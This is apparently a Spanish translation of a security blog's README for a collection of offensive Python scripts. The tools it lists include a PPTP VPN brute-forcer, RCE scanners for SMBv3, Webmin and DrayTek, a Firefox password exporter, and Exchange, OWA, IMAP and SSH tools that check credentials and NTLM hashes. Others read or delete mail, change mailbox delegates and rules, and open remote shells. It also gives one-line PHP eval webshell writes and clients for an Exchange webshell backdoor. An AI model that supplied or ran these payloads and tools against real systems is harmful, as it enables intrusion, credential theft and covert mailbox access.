
Códigos Python de mi blog.
Códigos Python de mi blog.
Usa un ataque de fuerza bruta para obtener la contraseña de la VPN PPTP.
Leerá las contraseñas del archivo (llamado wordlist) y luego usará pptpsetup para conectarse al servidor.
El intervalo de tiempo es de 10 segundos.
Se usa para escanear puertos.
El tiempo de espera es de 3 segundos.
versión en c++:
https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp
Se usa para obtener la IP a partir de la URL.
Se puede usar directamente el resultado de Sublist3r.
Se usa para eliminar IP duplicadas del resultado de Sublist3r.
Se puede usar directamente el resultado de urltoip.py.
Las IP se pueden ordenar usando Sublime (F9).
Se usa para eliminar elementos duplicados de un archivo.
Referencia:
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
Se usa para llamar a la API de fofa e imprimir las IP de los resultados.
Puedes obtener 100 resultados.
Se usa para llamar a la API de fofa e imprimir las IP de los resultados.
Si eres VIP, obtendrás 10000 resultados.
Referencia:
https://seclists.org/fulldisclosure/2019/Sep/31
Ej.
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php
Referencia:
https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w
Ej.
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');
Se usa para exportar las contraseñas de Firefox.
Se usa para obtener la versión de Exchange.
Primero obtén el BuildNumber a través del código fuente de la URL y luego obtén la versión.
Referencia:
Se usa para escanear la vulnerabilidad RCE de SMBv3.
El tiempo de espera es de 3 segundos.
Referencia:
https://github.com/imjdl/CVE-2020-8515-PoC
CVE-2020-8515
Los dispositivos DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta y Vigor300B 1.3.3_Beta, 1.4.2.1_Beta y 1.4.4_Beta permiten la ejecución remota de código como root (sin autenticación) mediante metacaracteres de shell en la URI cgi-bin/mainfunction.cgi..
Productos afectados:
Usa la API SOAP de Zimbra para conectarte al servidor de correo de Zimbra.
Uso:
Zimbra_SOAP_API.py <url> <username> <password> <mode>
modo:
Ej:
Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low
Se usa para comprobar cuentas válidas de Exchange Web Service (soporta texto plano y ntlmhash)
Referencia:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
Uso:
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash
Ej.
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1
Se usa para acceder a Autodiscover.xml y obtener la configuración del usuario (soporta texto plano y ntlmhash)
Uso:
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx
Ej.
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting
Modo extra de checkAutodiscover.py
Añade un parámetro
Se usa para acceder a Exchange Web Service (soporta texto plano y ntlmhash)
Uso:
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname
Ej.
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox
Se usa para comprobar credenciales válidas de SSH (soporta contraseña y archivo de clave privada)
Uso:
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile
Ej.
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa
Ejecución remota de comandos a través de SSH (soporta contraseña y archivo de clave privada)
Uso:
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell
Ej.
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps
Se usa para comprobar credenciales válidas de EAS (Exchange Server ActiveSync)
Uso:
easCheck.py <host> <user> <password>
Ej.
easCheck.py 192.168.1.1 user1 password1
Se usa para comprobar cuentas válidas de Exchange conectándose a OWA.
Uso:
checkOWA.py <url> <user> <password>
Se usa para leer correos conectándose a OWA.
Uso:
owaManage.py <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment
Usa IMAP para conectarse al servidor de correo.
Uso:
imapManage.py <IMAP server> <username> <password> <command>
<command>:
CheckConfig get the folder name
SaveAttachOfInbox save the attachments of Inbox
SaveAttachOfSent save the attachments of Sent
DownloadAllMailOfInbox download all the mails of Inbox
DownloadAllMailOfSent download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig
Se usa para implementar autenticación NTLM y comunicarse con execCmd.aspx
Los datos de comunicación están codificados con Base64
Uso:
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami
Versión en C#: SharpExchangeBackdoor.cs
Se usa para enviar payload a la webshell backdoor de Exchange.
Soporta:
Uso:
<url> <user> <password> <mode> <path>
mode:
assemblyLoad
webshellWrite
ej.